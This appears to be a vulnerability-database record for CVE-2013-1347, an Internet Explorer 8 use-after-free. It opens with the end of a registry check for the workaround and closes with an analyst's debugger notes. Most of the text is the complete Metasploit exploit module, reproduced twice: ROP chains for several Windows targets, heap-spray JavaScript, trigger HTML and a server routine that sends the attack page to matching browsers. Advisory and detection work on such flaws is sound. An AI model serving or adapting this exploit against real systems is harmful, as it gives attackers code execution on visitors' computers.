!isnull(value1) &&\n value == 73728 && value1 == 73728)\n mitigation = TRUE;\n\n# \"Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\"\n key_part_intranet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\1400';\n key_part_internet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\1400';\n\n value = get_registry_value(handle:hklm, item:key_part_intranet);\n value1 = get_registry_value(handle:hklm, item:key_part_internet);\n\n # 1 = prompt, 3 = disable\n if (!isnull(value) && !isnull(value1) &&\n (value == 1 || value == 3) && (value1 == 1 || value1 == 3))\n mitigation = TRUE;\n\n if (mitigation)\n info_user_settings = '';\n}\n\nRegCloseKey(handle:hklm);\n\nclose_registry();\n\nif (info_user_settings != '')\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (emet_info != '')\n report = \n '\\n The remote host is missing the MSHTML Shim workaround and the' +\n '\\n following users have vulnerable IE settings :' + info_user_settings + '\\n' + emet_info + '\\n';\n else\n report = \n '\\n The remote host is missing the MSHTML Shim workaround and the' +\n '\\n following users have vulnerable IE settings :' + info_user_settings + '\\n';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse exit(0, \"The host is not affected since a workaround has been applied.\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:06", "description": "", "published": "2013-05-07T00:00:00", "type": "packetstorm", "title": "Microsoft Internet Explorer CGenericElement Object Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1347"], "modified": "2013-05-07T00:00:00", "id": "PACKETSTORM:121542", "href": "https://packetstormsecurity.com/files/121542/Microsoft-Internet-Explorer-CGenericElement-Object-Use-After-Free.html", "sourceData": "`## \n# \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::RopDb \ninclude Msf::Exploit::Remote::BrowserAutopwn \nautopwn_info({ \n:ua_name => HttpClients::IE, \n:ua_minver => \"8.0\", \n:ua_maxver => \"8.0\", \n:javascript => true, \n:os_name => OperatingSystems::WINDOWS, \n:rank => GoodRanking \n}) \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Microsoft Internet Explorer. A \nuse-after-free condition occurs when a CGenericElement object is freed, but a \nreference is kept on the Document and used again during rendering, an invalid \nmemory that's controllable is used, and allows arbitrary code execution under the \ncontext of the user. \n \nPlease note: This vulnerability has been exploited in the wild on 2013 May, in \nthe compromise of the Department of Labor (DoL) Website. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', \n'EMH', \n'juan vazquez', #RCA \n'sinn3r' #RCA \n], \n'References' => \n[ \n[ 'CVE', '2013-1347' ], \n[ 'OSVDB', '92993' ], \n[ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'], \n[ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n'Space' => 1024, \n'DisableNops' => true \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ], \n[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ], \n[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ], \n[ 'IE 8 on Windows 7', { 'Rop' => :jre } ] \n], \n'Privileged' => false, \n'DisclosureDate' => \"May 3 2013\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \n \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || '' \nie = agent.scan(/MSIE (\\d)/).flatten[0] || '' \n \nie_name = \"IE #{ie}\" \n \ncase nt \nwhen '5.1' \nos_name = 'Windows XP SP3' \nwhen '5.2' \nos_name = 'Windows Server 2003' \nwhen '6.0' \nos_name = 'Windows Vista' \nwhen '6.1' \nos_name = 'Windows 7' \nelse \n# OS not supported \nreturn nil \nend \n \ntargets.each do |t| \nif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) \nprint_status(\"Target selected as: #{t.name}\") \nreturn t \nend \nend \n \nreturn nil \nend \n \ndef ie8_smil(my_target, p) \n \ncase my_target['Rop'] \nwhen :msvcrt \ncase my_target.name \nwhen 'IE 8 on Windows XP SP3' \nalign_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET \nxchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET \nwhen 'IE 8 on Windows Server 2003' \nalign_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\")) \nxchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\")) \nend \nelse \nalign_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\")) \nxchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\")) \nend \n \npadding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4)) \njs_payload = Rex::Text.to_unescape(p) \n \njs = %Q| \nunicorn = unescape(\"ABCD\"); \nunicorn2 = unescape(\"EEEE\"); \nfor (i=0; i < 2; i++) { \nunicorn += unescape(\"ABCD\"); \n}unicorn += unescape(\"AB\"); \n \nunicorn += unescape(\"#{js_payload}\"); \n \nanimvalues = unescape(\"#{align_esp}\"); \n \nfor (i=0; i < 0x70/4; i++) { \nif (i == 0x70/4-1) { \nanimvalues += unescape(\"#{xchg_esp}\"); \n} \nelse { \nanimvalues += unescape(\"#{align_esp}\"); \n} \n} \n \nanimvalues += unicorn; \n \nfor(i = 0; i < 13; i++) { \nanimvalues += \";red\"; \n} \n| \n \nif datastore['OBFUSCATE'] \njs = ::Rex::Exploitation::JSObfu.new(js) \njs.obfuscate \nend \n \nreturn js \nend \n \ndef junk(n=4) \nreturn rand_text_alpha(n).unpack(\"V\")[0].to_i \nend \n \ndef nop \nreturn make_nops(4).unpack(\"V\")[0].to_i \nend \n \ndef get_payload(t, cli) \ncode = payload.encoded \n \n# No rop. Just return the payload. \nreturn code if t['Rop'].nil? \n \ncase t['Rop'] \nwhen :msvcrt \ncase t.name \nwhen 'IE 8 on Windows XP SP3' \nrop_gadgets = \n[ \n0x77c1e844, # POP EBP # RETN [msvcrt.dll] \n0x77c1e844, # skip 4 bytes [msvcrt.dll] \n0x77c4fa1c, # POP EBX # RETN [msvcrt.dll] \n0xffffffff, \n0x77c127e5, # INC EBX # RETN [msvcrt.dll] \n0x77c127e5, # INC EBX # RETN [msvcrt.dll] \n0x77c4e0da, # POP EAX # RETN [msvcrt.dll] \n0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx) \n0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] \n0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll] \n0x77c34fcd, # POP EAX # RETN [msvcrt.dll] \n0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx) \n0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] \n0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll] \n0x77c3048a, # POP EDI # RETN [msvcrt.dll] \n0x77c47a42, # RETN (ROP NOP) [msvcrt.dll] \n0x77c46efb, # POP ESI # RETN [msvcrt.dll] \n0x77c2aacc, # JMP [EAX] [msvcrt.dll] \n0x77c3b860, # POP EAX # RETN [msvcrt.dll] \n0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll] \n0x77c12df9, # PUSHAD # RETN [msvcrt.dll] \n0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll] \n].pack(\"V*\") \nwhen 'IE 8 on Windows Server 2003' \nrop_gadgets = \n[ \n0x77bb2563, # POP EAX # RETN \n0x77ba1114, # <- *&VirtualProtect() \n0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN \njunk, \n0x77bb0c86, # XCHG EAX,ESI # RETN \n0x77bc9801, # POP EBP # RETN \n0x77be2265, # ptr to 'push esp # ret' \n0x77bb2563, # POP EAX # RETN \n0x03C0990F, \n0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) \n0x77bb48d3, # POP EBX, RET \n0x77bf21e0, # .data \n0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN \n0x77bbfc02, # POP ECX # RETN \n0x77bef001, # W pointer (lpOldProtect) (-> ecx) \n0x77bd8c04, # POP EDI # RETN \n0x77bd8c05, # ROP NOP (-> edi) \n0x77bb2563, # POP EAX # RETN \n0x03c0984f, \n0x77bdd441, # SUB EAX, 03c0940f \n0x77bb8285, # XCHG EAX,EDX # RETN \n0x77bb2563, # POP EAX # RETN \nnop, \n0x77be6591 # PUSHAD # ADD AL,0EF # RETN \n].pack(\"V*\") \nend \nelse \nrop_gadgets = \n[ \n0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN \n0xfffffdff, # Value to negate, will become 0x00000201 (dwSize) \n0x7c347f98, # RETN (ROP NOP) [msvcr71.dll] \n0x7c3415a2, # JMP [EAX] [msvcr71.dll] \n0xffffffff, \n0x7c376402, # skip 4 bytes [msvcr71.dll] \n0x7c351e05, # NEG EAX # RETN [msvcr71.dll] \n0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll] \n0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] \n0x7c344f87, # POP EDX # RETN [msvcr71.dll] \n0xffffffc0, # Value to negate, will become 0x00000040 \n0x7c351eb1, # NEG EDX # RETN [msvcr71.dll] \n0x7c34d201, # POP ECX # RETN [msvcr71.dll] \n0x7c38b001, # &Writable location [msvcr71.dll] \n0x7c347f97, # POP EAX # RETN [msvcr71.dll] \n0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] \n0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] \n0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll] \n# rop chain generated with mona.py \n].pack(\"V*\") \nend \n \nrop_payload = rop_gadgets \ncase t['Rop'] \nwhen :msvcrt \nrop_payload << \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500 \nelse \nrop_payload << \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000 \nend \nrop_payload << code \nrop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt \n \nreturn rop_payload \nend \n \ndef load_exploit_html(my_target, cli) \n \np = get_payload(my_target, cli) \njs = ie8_smil(my_target, p) \n \nhtml = %Q| \n<!doctype html> \n<HTML XMLNS:t =\"urn:schemas-microsoft-com:time\"> \n<head> \n<meta> \n<?IMPORT namespace=\"t\" implementation=\"#default#time2\"> \n</meta> \n \n<script> \nfunction helloWorld() \n{ \n#{js} \nf0 = document.createElement('span'); \ndocument.body.appendChild(f0); \nf1 = document.createElement('span'); \ndocument.body.appendChild(f1); \nf2 = document.createElement('span'); \ndocument.body.appendChild(f2); \ndocument.body.contentEditable=\"true\"; \nf2.appendChild(document.createElement('datalist')); \nf1.appendChild(document.createElement('span')); \nf1.appendChild(document.createElement('table')); \ntry{ \nf0.offsetParent=null; \n}catch(e) { \n \n}f2.innerHTML=\"\"; \nf0.appendChild(document.createElement('hr')); \nf1.innerHTML=\"\"; \n \nCollectGarbage(); \n \ntry { \na = document.getElementById('myanim'); \na.values = animvalues; \n} \ncatch(e) {} \n} \n \n</script> \n</head> \n<body onload=\"eval(helloWorld());\"> \n<t:ANIMATECOLOR id=\"myanim\"/> \n \n</body> \n</html> \n| \n \nreturn html \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nuri = request.uri \nprint_status(\"Requesting: #{uri}\") \n \nmy_target = get_target(agent) \n# Avoid the attack if no suitable target found \nif my_target.nil? \nprint_error(\"Browser not supported, sending 404: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nhtml = load_exploit_html(my_target, cli) \nhtml = html.gsub(/^\\t\\t/, '') \nprint_status(\"Sending HTML...\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nend \n \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121542/ie_cgenericelement_uaf.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-03T01:03:30", "description": "Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability. CVE-2013-1347. Remote exploit for windows platform", "published": "2013-05-07T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1347"], "modified": "2013-05-07T00:00:00", "id": "EDB-ID:25294", "href": "https://www.exploit-db.com/exploits/25294/", "sourceData": "##\r\n#\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n autopwn_info({\r\n :ua_name => HttpClients::IE,\r\n :ua_minver => \"8.0\",\r\n :ua_maxver => \"8.0\",\r\n :javascript => true,\r\n :os_name => OperatingSystems::WINDOWS,\r\n :rank => GoodRanking\r\n })\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\r\n use-after-free condition occurs when a CGenericElement object is freed, but a\r\n reference is kept on the Document and used again during rendering, an invalid\r\n memory that's controllable is used, and allows arbitrary code execution under the\r\n context of the user.\r\n\r\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\r\n the compromise of the Department of Labor (DoL) Website.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown',\r\n 'EMH',\r\n 'juan vazquez', #RCA\r\n 'sinn3r' #RCA\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1347' ],\r\n [ 'OSVDB', '92993' ],\r\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\r\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'Space' => 1024,\r\n 'DisableNops' => true\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\r\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\r\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\r\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"May 3 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n\r\n end\r\n\r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n\r\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n\r\n ie_name = \"IE #{ie}\"\r\n\r\n case nt\r\n when '5.1'\r\n os_name = 'Windows XP SP3'\r\n when '5.2'\r\n os_name = 'Windows Server 2003'\r\n when '6.0'\r\n os_name = 'Windows Vista'\r\n when '6.1'\r\n os_name = 'Windows 7'\r\n else\r\n # OS not supported\r\n return nil\r\n end\r\n\r\n targets.each do |t|\r\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n print_status(\"Target selected as: #{t.name}\")\r\n return t\r\n end\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def ie8_smil(my_target, p)\r\n\r\n case my_target['Rop']\r\n when :msvcrt\r\n case my_target.name\r\n when 'IE 8 on Windows XP SP3'\r\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\r\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\r\n when 'IE 8 on Windows Server 2003'\r\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\r\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\r\n end\r\n else\r\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\r\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\r\n end\r\n\r\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\r\n js_payload = Rex::Text.to_unescape(p)\r\n\r\n js = %Q|\r\n unicorn = unescape(\"ABCD\");\r\n unicorn2 = unescape(\"EEEE\");\r\n for (i=0; i < 2; i++) {\r\n unicorn += unescape(\"ABCD\");\r\n }unicorn += unescape(\"AB\");\r\n\r\n unicorn += unescape(\"#{js_payload}\");\r\n\r\n animvalues = unescape(\"#{align_esp}\");\r\n\r\n for (i=0; i < 0x70/4; i++) {\r\n if (i == 0x70/4-1) {\r\n animvalues += unescape(\"#{xchg_esp}\");\r\n }\r\n else {\r\n animvalues += unescape(\"#{align_esp}\");\r\n }\r\n }\r\n\r\n animvalues += unicorn;\r\n\r\n for(i = 0; i < 13; i++) {\r\n animvalues += \";red\";\r\n }\r\n |\r\n\r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n\r\n return js\r\n end\r\n\r\n def junk(n=4)\r\n return rand_text_alpha(n).unpack(\"V\")[0].to_i\r\n end\r\n\r\n def nop\r\n return make_nops(4).unpack(\"V\")[0].to_i\r\n end\r\n\r\n def get_payload(t, cli)\r\n code = payload.encoded\r\n\r\n # No rop. Just return the payload.\r\n return code if t['Rop'].nil?\r\n\r\n case t['Rop']\r\n when :msvcrt\r\n case t.name\r\n when 'IE 8 on Windows XP SP3'\r\n rop_gadgets =\r\n [\r\n 0x77c1e844, # POP EBP # RETN [msvcrt.dll]\r\n 0x77c1e844, # skip 4 bytes [msvcrt.dll]\r\n 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]\r\n 0xffffffff,\r\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n 0x77c4e0da, # POP EAX # RETN [msvcrt.dll]\r\n 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)\r\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]\r\n 0x77c34fcd, # POP EAX # RETN [msvcrt.dll]\r\n 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)\r\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]\r\n 0x77c3048a, # POP EDI # RETN [msvcrt.dll]\r\n 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]\r\n 0x77c46efb, # POP ESI # RETN [msvcrt.dll]\r\n 0x77c2aacc, # JMP [EAX] [msvcrt.dll]\r\n 0x77c3b860, # POP EAX # RETN [msvcrt.dll]\r\n 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]\r\n 0x77c12df9, # PUSHAD # RETN [msvcrt.dll]\r\n 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]\r\n ].pack(\"V*\")\r\n when 'IE 8 on Windows Server 2003'\r\n rop_gadgets =\r\n [\r\n 0x77bb2563, # POP EAX # RETN\r\n 0x77ba1114, # <- *&VirtualProtect()\r\n 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN\r\n junk,\r\n 0x77bb0c86, # XCHG EAX,ESI # RETN\r\n 0x77bc9801, # POP EBP # RETN\r\n 0x77be2265, # ptr to 'push esp # ret'\r\n 0x77bb2563, # POP EAX # RETN\r\n 0x03C0990F,\r\n 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)\r\n 0x77bb48d3, # POP EBX, RET\r\n 0x77bf21e0, # .data\r\n 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN\r\n 0x77bbfc02, # POP ECX # RETN\r\n 0x77bef001, # W pointer (lpOldProtect) (-> ecx)\r\n 0x77bd8c04, # POP EDI # RETN\r\n 0x77bd8c05, # ROP NOP (-> edi)\r\n 0x77bb2563, # POP EAX # RETN\r\n 0x03c0984f,\r\n 0x77bdd441, # SUB EAX, 03c0940f\r\n 0x77bb8285, # XCHG EAX,EDX # RETN\r\n 0x77bb2563, # POP EAX # RETN\r\n nop,\r\n 0x77be6591 # PUSHAD # ADD AL,0EF # RETN\r\n ].pack(\"V*\")\r\n end\r\n else\r\n rop_gadgets =\r\n [\r\n 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN\r\n 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)\r\n 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]\r\n 0x7c3415a2, # JMP [EAX] [msvcr71.dll]\r\n 0xffffffff,\r\n 0x7c376402, # skip 4 bytes [msvcr71.dll]\r\n 0x7c351e05, # NEG EAX # RETN [msvcr71.dll]\r\n 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]\r\n 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]\r\n 0x7c344f87, # POP EDX # RETN [msvcr71.dll]\r\n 0xffffffc0, # Value to negate, will become 0x00000040\r\n 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]\r\n 0x7c34d201, # POP ECX # RETN [msvcr71.dll]\r\n 0x7c38b001, # &Writable location [msvcr71.dll]\r\n 0x7c347f97, # POP EAX # RETN [msvcr71.dll]\r\n 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]\r\n 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]\r\n 0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]\r\n # rop chain generated with mona.py\r\n ].pack(\"V*\")\r\n end\r\n\r\n rop_payload = rop_gadgets\r\n case t['Rop']\r\n when :msvcrt\r\n rop_payload << \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n else\r\n rop_payload << \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\r\n end\r\n rop_payload << code\r\n rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt\r\n\r\n return rop_payload\r\n end\r\n\r\n def load_exploit_html(my_target, cli)\r\n\r\n p = get_payload(my_target, cli)\r\n js = ie8_smil(my_target, p)\r\n\r\n html = %Q|\r\n <!doctype html>\r\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\r\n <head>\r\n <meta>\r\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\r\n </meta>\r\n\r\n <script>\r\n function helloWorld()\r\n {\r\n #{js}\r\n f0 = document.createElement('span');\r\n document.body.appendChild(f0);\r\n f1 = document.createElement('span');\r\n document.body.appendChild(f1);\r\n f2 = document.createElement('span');\r\n document.body.appendChild(f2);\r\n document.body.contentEditable=\"true\";\r\n f2.appendChild(document.createElement('datalist'));\r\n f1.appendChild(document.createElement('span'));\r\n f1.appendChild(document.createElement('table'));\r\n try{\r\n f0.offsetParent=null;\r\n }catch(e) {\r\n\r\n }f2.innerHTML=\"\";\r\n f0.appendChild(document.createElement('hr'));\r\n f1.innerHTML=\"\";\r\n\r\n CollectGarbage();\r\n\r\n try {\r\n a = document.getElementById('myanim');\r\n a.values = animvalues;\r\n }\r\n catch(e) {}\r\n }\r\n\r\n </script>\r\n </head>\r\n <body onload=\"eval(helloWorld());\">\r\n <t:ANIMATECOLOR id=\"myanim\"/>\r\n\r\n </body>\r\n </html>\r\n |\r\n\r\n return html\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n uri = request.uri\r\n print_status(\"Requesting: #{uri}\")\r\n\r\n my_target = get_target(agent)\r\n # Avoid the attack if no suitable target found\r\n if my_target.nil?\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n html = load_exploit_html(my_target, cli)\r\n html = html.gsub(/^\\t\\t/, '')\r\n print_status(\"Sending HTML...\")\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/25294/"}], "attackerkb": [{"lastseen": "2020-11-15T18:36:40", "bulletinFamily": "info", "cvelist": ["CVE-2012-4792", "CVE-2013-1347"], "description": "CVE-2013-1347 was an 0day exploit distributed on a compromised US Department of Labor web server. Initially, people thought the exploit was CVE-2012-4792 because the JavaScript was rather similar to ie_cbutton_uaf.rb. We don\u2019t actually have the original malware sample, but we think the mstime allocation trick was used in the malware (technique first publicly introduced in ie_cbutton_uaf), hence the misunderstanding.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\n\u2014 Allocating 0x4C bytes from InsertElementInternal: 0x0563cfb0\n \n \n In 0x0563cfb0, offset+0 holds a reference to a mshtml!CGenericElement::`vftable':\n \n \n\neax=037cc598 ebx=037cc548 ecx=04a48d10 edx=633b5f09 esi=070eefa0 edi=037cc538 \neip=633b5f09 esp=037cc4f8 ebp=037cc55c iopl=0 nv up ei pl zr na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 \njscript!JsAtan2: \n633b5f09 8bff mov edi,edi \n0:008> dc 0x0563cfb0; .echo; dc poi(0x0563cfb0) \n0563cfb0 06a99fc8 00000000 ffff0075 ffffffff \u2026\u2026..u\u2026\u2026. \n0563cfc0 00000071 00000000 00000000 00000000 q\u2026\u2026\u2026\u2026\u2026 \n0563cfd0 00000000 0563cfd8 00000152 00000001 \u2026\u2026c.R\u2026\u2026. \n0563cfe0 00000000 00000000 0563cfc0 00000000 \u2026\u2026\u2026.c\u2026.. \n0563cff0 00000010 00000000 00000000 d0d0d0d0 \u2026\u2026\u2026\u2026\u2026. \n0563d000 ???????? ???????? ???????? ???????? ???????????????? \n0563d010 ???????? ???????? ???????? ???????? ???????????????? \n0563d020 ???????? ???????? ???????? ???????? ????????????????\n\n06a99fc8 635db4c8 00000001 00000008 07018fe8 ..]c\u2026\u2026\u2026\u2026 \n06a99fd8 049e8d80 00000000 80000075 80010000 \u2026\u2026..u\u2026\u2026. \n06a99fe8 00000006 0580afe8 06d9efec 00000000 \u2026\u2026\u2026\u2026\u2026. \n06a99ff8 00000000 00000000 ???????? ???????? \u2026\u2026..???????? \n06a9a008 ???????? ???????? ???????? ???????? ???????????????? \n06a9a018 ???????? ???????? ???????? ???????? ???????????????? \n06a9a028 ???????? ???????? ???????? ???????? ???????????????? \n06a9a038 ???????? ???????? ???????? ???????? ???????????????? \n0:008> !heap -p -a poi(0x0563cfb0)\n \n \n address 06a99fc8 found in\n _DPH_HEAP_ROOT @ 151000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 5087390: 6a99fc8 38 - 6a99000 2000\n mshtml!CGenericElement::`vftable'\n 7c918f01 ntdll!RtlAllocateHeap+0x00000e64\n 635db42e mshtml!CGenericElement::CreateElement+0x00000018\n 635a67f5 mshtml!CreateElement+0x00000043\n 637917c0 mshtml!CMarkup::CreateElement+0x000002de\n 63791929 mshtml!CDocument::CreateElementHelper+0x00000052\n 637918a2 mshtml!CDocument::createElement+0x00000021\n 635d3820 